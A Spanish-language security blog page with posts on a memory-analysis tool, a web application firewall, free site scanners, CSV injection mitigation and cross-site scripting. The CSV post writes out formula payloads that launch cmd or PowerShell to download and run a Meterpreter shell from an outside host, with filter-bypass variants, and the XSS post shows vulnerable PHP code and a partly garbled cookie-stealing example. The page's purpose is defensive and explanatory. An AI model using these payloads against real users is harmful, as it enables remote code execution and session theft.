seguridad web

VOLATILITY BOT – UN ANALIZADOR DE MEMORIA AUTOMATIZADO PARA ANÁLISIS DE MALWARE Y MEMORIA

Posted on

votality-bot1

 

 

 

 

 

 

 

 

 

 

 

Parte del trabajo de los investigadores de seguridad informática que tienen que pasar dificultades cuando estudian nuevos programas maliciosos o desean analizar ejecutables sospechosos lo cual consiste en extraer el archivo binario y todas las diferentes inyecciones y cadenas descifradas durante la ejecución del malware. Volatility Bot fue creado por expertos de seguridad web para resolver estos tipos de problemas.

Según investigadores de seguridad informática, Volatility Bot es una herramienta de automatización para investigadores de seguridad web que corta todas las tareas de conjeturas y manuales de la fase de extracción binaria, también sirve para ayudar al investigador de seguridad web en los primeros pasos de realizar una investigación de análisis de memoria. No sólo extrae automáticamente el ejecutable (exe), sino que también busca todos los nuevos procesos creados en la memoria, inyecciones de código, cadenas, direcciones IP, etc.

En la nueva versión de Volatility Bot, una nueva característica es el análisis automatizado de vaciados de memoria, utilizando heurística y YARA / Clam AV Scanners. Según expertos de seguridad web, de de International Institute of Cyber Security IICS esta función es útil para el análisis de la memoria a escala. Por lo general, este proceso inicial se realiza manualmente, ya sea a través de una muestra de malware o un vaciado de memoria y puede ser largo y tedioso.

CARACTERÍSTICAS ACTUALES

  • Análisis automatizado de muestras de malware (Basado en diferencias entre la imagen de memoria limpia y la infectada)
    • Extracción del código inyectado
    • Descarga de nuevos procesos
    • Escaneo Yara, análisis estático, extracción de cadenas, etc. en todos los trabajaos.
  • Análisis heuristic automatizado de los vaciados de memoria que ayuda muchos los investigadores de seguridad informática.
    • Detectar anomalías usando heuristic y arrojar el código relevante
    • Análisis Yara, análisis estático, extracción de cadenas, etc. en todos los trabajos.

INSTALACIÓN

  1. Crear una nueva máquina virtual, con Windows XP hasta Windows 10 x64.
  2. Asegúrese de que la máquina tiene windows defender, programas de seguridad informática, seguridad web y FW deshabilitados, y tiene un IP estático
  3. Instalar python 3.5
  4. Crear c: \ temp carpeta, o cambie la carpeta de destino en config
  5. Copie el agente.py de Utils e inícielo
  6. Tome una instantánea de la VM
  7. Repita los pasos 1-6 para tantas máquinas virtuales como desee

volatility-bot

https://github.com/mkorman90/VolatilityBot

RAPTOR WAF – UN FIREWALL GRATIS DE APLICACIONES WEB

Posted on

raptor-waf

Un firewall de aplicaciones web (WAF) es un firewall que supervisa seguridad web, filtra o bloquea el tráfico HTTP hacia y desde una aplicación Web.Un WAF también es capaz de detectar y prevenir nuevos ataques desconocidos al observar patrones desconocidos en los datos de tráfico. Raptor WAF es un firewall de aplicaciones web hecho en C, que usa DFA para ayudar en seguridad web y bloquear SQL Inyección, Cross Site Scripting (XSS) y PathTraversal.

Es esencialmente un firewall de aplicación web simple hecho en C, usando el principio KISS, haciendo poll utilizando la función select (), no es mejor que epoll () o kqueue () de BSD, pero es portátil.

Caracteristicas

Según los expertos de seguridad web de iicybersecurity, WAF como Raptor puede ser utilizado por PYMES para implementar seguridad web. Es ampliamente utilizado hoy en día para detectar y defenderse contra la mayoría de las inyecciones de SQL, ataques contra seguridad web y ataques XSS.

  • Bloquear ataques contra seguridad web como de XSS, Inyección de SQL y path traversal
  • Lista negra IPs para bloquear usuarios usando config / blacklist ip.txt
  • Soporta IPv6 e IPv4 para la comunicación

raptor-waf

 

https://github.com/CoolerVoid/raptor_waf

12 HERRAMIENTAS GRATUITAS PARA ASEGURAR PÁGINAS WEB

Posted on

Una de las conversaciones de tendencias en tecnologías de la información es la seguridad Web. ¿Sabías que el 96% de las aplicaciones probadas tienen vulnerabilidades? A menudo prestamos atención a la página web de diseño, SEO, contenidos y subestimamos el área de seguridad en páginas web. En un sitio web, la auditoría de seguridad informática debe tener una importancia más alta que cualquier otra cosa.

Uno de los elementos esenciales para la seguridad web consiste en vigilar por lo que recibirás una notificación cada vez que está este caído o hackeado. Mientras que las herramientas te ayudarán a escanear tu sitio web bajo demanda puede que sea mejor programarlos para una auditoria de seguridad informática automática según expertos de International Institute of Cyber Security IICS. Estas herramientas ayudarían implementar seguridad en páginas web. En este artículo, vamos a enumerar herramientas gratuitas para escanear tu sitio web en busca de vulnerabilidades de seguridad web y malware.

 

SCAN MY SERVER

scan-my-server

Scan My Server proporciona uno de los informes más completos de las variedades de auditoría de seguridad informática como Inyección SQL, Cross Site Scripting, PHP Inyección, Source Disclosure, HTTP Header Inyección, Blind SQL Inyección y mucho más. El informe de análisis de seguridad web es notificado por correo electrónico con el resumen de vulnerabilidades.

SUCURI

sucuri

Sucuri es el sitio web gratuito más popular para escáner malware y la seguridad en páginas web. Usted puede hacer una prueba rápida para malware, listas negras de sitios web, SPAM y desfiguraciones inyectadas. Sucuri limpia y la protege tu sitio web contra amenazas en línea y funciona en cualquier tipo de plataformas, incluyendo el sitio web de WordPress, Joomla, Magento, Drupal, php,etc.

 

SITE GUARDING

site-guarding

Site Guarding ayuda a escanear tu dominio en busca de malware, listas negras de sitios web, Spam inyectados, vulnerabilidades de seguridad web, desfiguración y mucho más. El escáner es compatible con WordPress, Joomla, Drupal, Magento, osCommerce, Bulletin y otra plataforma. SiteGuarding también te ayuda a eliminar el malware de tu sitio web por lo que si tu página web se ve afectada por virus, te será de utilidad para implementar seguridad en páginas web.

 

DETECTIFY

detectify

Detectify es un escáner de seguridad web basado en SaaS. Esto tiene más de 100 pruebas de seguridad automatizadas incluyendo OWASP Top 10, malware y mucho más. Detectify ofrece una prueba gratuita de 21 días y usted debe registrarse para poder realizar una auditoría de seguridad informática de tu página web.

 

ACUNETIX

Acunetix-Web-Vulnerability-Scanner

Acunetix analiza tu página web completa para más de 500 vulnerabilidades de seguridad web incluyendo DNS y la infraestructura de red de los servidores de Acunetix. Proporcionan una prueba gratuita de 14 días y puedes registrar y validar tu dominio antes de la auditoría de seguridad informática.

 

WEB INSPECTOR

web-inspector

Web Inspector explora tu sitio web y proporciona informes, inclusive la lista negra, vulnerabilidades de seguridad web, phishing, malware, gusanos, puertas traseras, troyanos, marcos sospechosas, las conexiones sospechosas según expertos de International Institute of Cyber Security IICS. Por lo tanto, sigue adelante y realiza una auditoría de seguridad informática para saber si está seguro o no.

 

TINFOIL SECURITY

Tinfoil Security

 

Tinfoil Security primero hace la auditoría de seguridad informática de tu sitio web en contra de las 10 principales vulnerabilidades de OWASP y luego otros orificios de seguridad web conocidos. Usted recibirá informes procesables y la opción de volver a escanear una vez que haya terminado con las correcciones necesarias. La configuración tomará alrededor de 5 minutos y se puede escanear incluso si tu sitio web está protegido.

 

QUTTERA

quettera

Quttera revisa la seguridad en páginas web para el malware y las vulnerabilidades de seguridad web. Escanea tu sitio web para archivos maliciosos, archivos potencialmente sospechosas, archivos sospechosos, PhishTank, Navegación segura (Google, Yandex) y la lista de dominios de malware.

 

QUALYS SSL LABS, QUALYSFREESCAN

qualys-server-test

SSL Labses una de las herramientas más usada para analizar servidores web SSL. Proporciona una auditoría de seguridad informática profunda de tu https URL incluyendo el día de vencimiento, calificación global, cifra, SSL / TLS versión, simulación de Handshake, detalles del protocolo y mucho más acuerdo a los expertos de iicybersecurity IICS. Si estás ejecutando un sitio web seguro (https), no se debes esperar más para hacer una prueba de seguridad en páginas web.

Esto pone a prueba el sitio web contra el top de riesgos OWASP y malwares, contra el índice de referencia de seguridad SCP y mucho más. Es necesario registrar una cuenta gratuita para poder realizar este escaneo.

NETSPARKER CLOUD

netsparker-cloud

Netsparker Cloud es un escáner de seguridad web empresarial, que escanea más de 25 vulnerabilidades críticas acuerdo a los expertos de iicybersecurity IICS. Netsparker es libre para otro proyecto de código abierto que se puede solicitar para el ensayo de la auditoría de seguridad informática.

UPGUARD WEB SCAN

upguard-webscan

UpGuard Web Scanes herramienta de evaluación de riesgo externo que utiliza la información a disposición del público para calificar de varios factores, incluyendo SSL, ataque Clickjack, Cookie, DNSSEC, Headers, etc. Está todavía en fase beta, pero vale la pena probar la seguridad web.

ASAFA WEB

asafaweb

AsafaWeb proporciona resultados rápidos de la auditoría de seguridad informática que incluye de Tracing, Stack trace, Hash Dos Patch, EMLAH log, HTTP Only Cookies, Secure Cookies, Clickjacking y mucho más.

 

¿CÓMO MITIGAR UN ATAQUE DE INYECCIÓN CSV?

Posted on

Los expertos de seguridad web mencionan que un atacante puede explotar esta funcionalidad mediante la inserción de caracteres arbitrarios en formas que sean exportables (sea esto a través de un análisis, contactos u otras funcionalidades). Permitiendo en consecuencia, a dicho atacante pueda formular una carga útil de ataque que se ejecuta cuando dicho archivo CSV se descarga y podría romper seguridad perimetral.

El escenario de este ataque se dirige  puramente al usuario (s) que descarga el archivo CSV, naturalmente, este ataque de seguridad web se suele descartar como un problema sin embargo sitios web todavía deben estar al tanto de la información que están exportando porque puede ser potencialmente perjudicial para seguridad perimetral de los usuarios.

El playload más común visto es similar a la que se muestra a continuación:

=cmd|’ /C calc’!A0

Esta cadena en su núcleo, le está diciendo esencialmente al programa que está abierto con el programa que le gustaría ejecutar cmd.exe con las siguientes banderas /C calc que a su vez pondrán en marcha calc.exe desde la línea de comandos.

Para formular un payload meterpreter en la víctima, hemos adaptado una cadena de payload para que sea más corto y más fácil de inyectar, como resultado, el siguiente payload se puede utilizar

=cmd|'/C powershell IEX(wget 0r.pe/p)'!A0

Donde en este caso url cortado 0r.pe es utilizado para entregar el payload para no ser detectado por seguridad perimetral(Invoke-Shellcode) que es una función de Powersploit para permitir la entrega de meterpreteshells. Para acortar el payload aún más la siguiente cadena también se puede utilizar, que corta la necesidad de la cadena de cmd.

=powershell|'IEX(wget 0r.pe/p)'!A0

Esto directamente lanzará PowerShell desde la célula afectada en editor de hojas de cálculo de su elección. Estos payloads están todos muy bien y bien sin embargo, la  mayoría de las veces que no he estado viendo el = carácter está siendo filtrado hacia fuera menciona experto de seguridad web.

Sin embargo, utilizando el conocimiento personal Microsoft Excel y seguridad web, también es posible intact el payload usando otras combinaciones de caracteres tales como @, + o – en una variedad de diferentes combinaciones.

@SUM(1+1)*cmd|’ /C calc’!A0

O para cuantificar el peligro:

@SUM(1+1)*cmd|' powershell IEX(wget 0r.pe/p)'!A0

Una vez dicho todo esto y hablado de los diversos payloads hay pasos de mitigación que se pueden tomar para eliminar más o menos la amenaza de secuencias de comandos PowerShell que infestan el sistema de un usuario con shells acuerdo a los expertos de seguridad web.

PASOS PARA LA MITIGACIÓN

Las medidas recomendadas para remediar este problema de seguridad web se han descrito anteriormente sería asegurar que las formulario que se pueden exportar si contengan únicamente caracteres alfanuméricos y no puedan ser modificados para añadir caracteres arbitrarios.

También se debe considerar que todas las entradas de los usuarios no pueden  ser de confianza y como resultado cualquier salida debe ser codificada. La salida de esta funcionalidad se debe asumir como texto y no fórmulas. Lo que podrían adoptarse medidas para designar fácilmente como tal al colocar las cotizaciones en todo el texto o la aplicación de características de escape como se describe y se demuestra a continuación según curso de seguridad perimetral.

El problema con los vectores de inyección CSV discutidos arriba no tiene en realidad que ver con el carácter @, o =, +, -. El problema radica en el carácter pipe (|), el cual Excel y otras aplicaciones interpretan para ejecutar comandos {arbitrarios} y windows lanza binarios. De la lectura de los ataques de seguridad web y la investigación de las posibles técnicas de mitigación con ayuda de expertos de seguridad perimetral que la mejor solución es escapar del carácter pipe en este escenario de ataque es poner un prefijo \ antes del pipe. Esto se debe a que  Excel y otros programas que buscan un ejecutable llamado  cmd.exe o powershell.exe sin embargo, cuando añadiendo un \ dentro de la trayectoria evitará el lanzamiento de exe.

Además también hemos escrito un script en Python para escapar de archivos CSV que se pueden ver a continuación, es una prueba rápida del concepto sin embargo se puede adaptar fácilmente:

def escape(payload):   

           if payload[0] in (‘@’,’+’,’-‘, ‘=’, ‘|’):           

                payload = payload.replace(“|”, “\|”)            

               payload = “‘” + payload + “‘”    

            return payload 

# An example of payload string payload

= “@cmd|’ /C calc’!A0”

print “The Unescaped version is: ” + payload

print “When passed though escape function the value is: ” +

escape(payload)

En el código anterior se puede observar que si una cadena de payload contiene cualquiera de los caracteres en la lista negra se han evitado el ataque, esto se demuestra en la salida del script:

root@zsec:# python escape_csv.py

El version Unescaped es:

“@cmd|’ /C calc’!A0”

When passed though escape function the value is: ‘@cmd\|’ /C calc’!A0′

Note que desde la salida se puede ver que la versión escapada tiene un conjunto de’ alrededor de la cadena de usuario y el carácter pipe también se ha escapado. Cabe señalar que los problemas descritos anteriormente son sólo un tipo de ataque de inyección CSV, esta mitigación no cubre los ataques sobre seguridad web que se pueden llevar a cabo utilizando la misma técnica pero con diferentes payloads.

¿QUÉ ES CROSS SITE SCRIPTING Y CÓMO SOLUCIONARLO?

Posted on

¿Qué es Cross Site Scripting y cómo solucionarlo?

Cross Site Scripting es un tipo de ataque que se puede llevar a cabo para poner en peligro a los usuarios de una página web y seguridad de páginas web. La explotación de una falla XSS permite al atacante inyectar secuencias de comandos en el lado del cliente en las páginas web visitadas por los usuarios. A menudo se asume que significa JavaScript, pero también podría incluir, VBScript según expertos de seguridad web.

Los expertos de seguridad de páginas web dicen que es la vulnerabilidad más común, y muchos sitios son afectados. Se extiende desde pequeños sitios privados locales hacia gigantes como Google.

IMPACTO POTENCIAL SOBRE SEGURIDAD WEB

Debido a la capacidad de ejecutar JavaScript bajo el dominio del sitio, los atacantes son capaces de:

  • Leer todos los cookies, incluyendo los cookies de sesión. Al hacerlo, un atacante podría hacerse cargo de la sesión.
  • Ver cualquier cosa que el usuario ve, y robar información confidencial de este modo.
  • Cambiar lo que el usuario ve y manipular la información.
  • Básicamente hacer todo lo que un usuario normal puede, como el atacante puede ver y cambiar todo lo que presentan al usuario. Esto incluye la derivación de todas las protecciones CSRF implementadas para seguridad de páginas web. Para ponerlo en contexto; si el atacante con éxito pueda ejecutar el XSS, el atacante puede hacer todo lo que un administrador podría hacer.
  • Hacer cosas que el dominio vulnerable tiene acceso a hacer, lo que puede comprar el acceso a la cámara web del usuario, el micrófono o la ubicación.

EXPLOTACIÓN DE SEGURIDAD WEB

Cualquier fuente de datos que el navegador termina reproduciendo es un vector potencial de ataque. Esto significa que hay muchas maneras diferentes potenciales para explotar el sitio, y por lo tanto el riesgo de seguridad web aumenta.

Cross site scripting es considerado uno de los más fáciles tipos de vulnerabilidad para comprender. Dicho esto, no hay límites sobre lo complicado que puede ser, para explotar bajo diferentes circunstancias y protecciones según expertos de seguridad de páginas web.

¿CÓMO DESCUBRIRLO?

Es posible categorizar las vulnerabilidades de XSS en diferentes sub categorías. Una de esas son las que sólo ponen en el cliente, en donde el propietario del sitio tendría que analizar todo el JavaScript para identificar todos los flujos de datos que se originan a partir de un usuario. En un primer momento, es fácil pensar en sólo los lugares normales, pero después de un tiempo, es obvio que hay muchos más vectores de los que se pensaba inicialmente.

Luego están los llamados reflected XSS que también afecta la seguridad de páginas web, que es cuando la página simplemente refleja algún tipo de entrada del usuario. Por ejemplo:

<?php echo $_GET[“g]; ?>

Sin embargo, también hay stored XSS que también afecta la seguridad de páginas web, en el que el servidor muestra algo que está en la base de datos. En resumen, se puede concluir que para descubrir el primer tipo mencionado necesitaría el propietario del sitio seguir el flujo de datos a lo largo de JavaScript para ver cómo trata la entrada del usuario. En este caso, la entrada del usuario pueden ser variables predeterminadas en JavaScript como location.hash, así como, por ejemplo, form-data. Para la segunda vulnerabilidad los expertos de seguridad web mencionan que el propietario del sitio tiene que buscar cada ubicación donde se imprimieron datos, e identificar la forma en que trataron, así como donde se originan. En los ejemplos de la vida real, no es raro ver a una combinación de estos tipos de vulnerabilidad.

EJEMPLO DE CÓDIGO DE APLICACIÓN VULNERABLE

Suponga que un sitio tiene un cuadro de búsqueda con el código como el siguiente:

<?php // Code for performing the actual search } else { echo “Could not find any pages when searching for “.$_GET[‘query’];} ?>

https://example.com/search.php?query=test

Could not find any pages when searching for test

Esto haría salida de la entrada del usuario directamente al documento HTML. Por lo tanto, si un usuario diera HTML como entrada sería necesario para al navegador a aceptar eso.

Por ejemplo, si tuviéramos que acceder

https://example.com/search.php?query=//

Eso daría lugar a lo siguiente que el navegador trataría de hacer.

No se pudo encontrar ninguna página en la búsqueda de

alert(1)

Esto es perfectamente válido HTML, y el script lo ejecutara.

Para mostrar el peligro de esto, imagina a un atacante consiguiendo que el usuario haga clic en un enlace como el siguiente:

https://example.com/search.php?query=document.InnerHTML += “

El resultado sería este, que envía las cookies al atacante. Por ejemplo, fueron sesiones de identificación, un atacante podría secuestrar la sesión.

No se pudo encontrar ninguna página en la búsqueda de

document.InnerHTML += “

Deben sanitar las entradas de datos. La aplicación también debe desarrollarse con el riesgo de XSS en cuenta, y resolver las vulnerabilidades XSS. Dos de los métodos más conocidos de esto es HttpOnly y CSP. Pueden aprender más sobre cómo arreglar XSS durante el curso de seguridad web.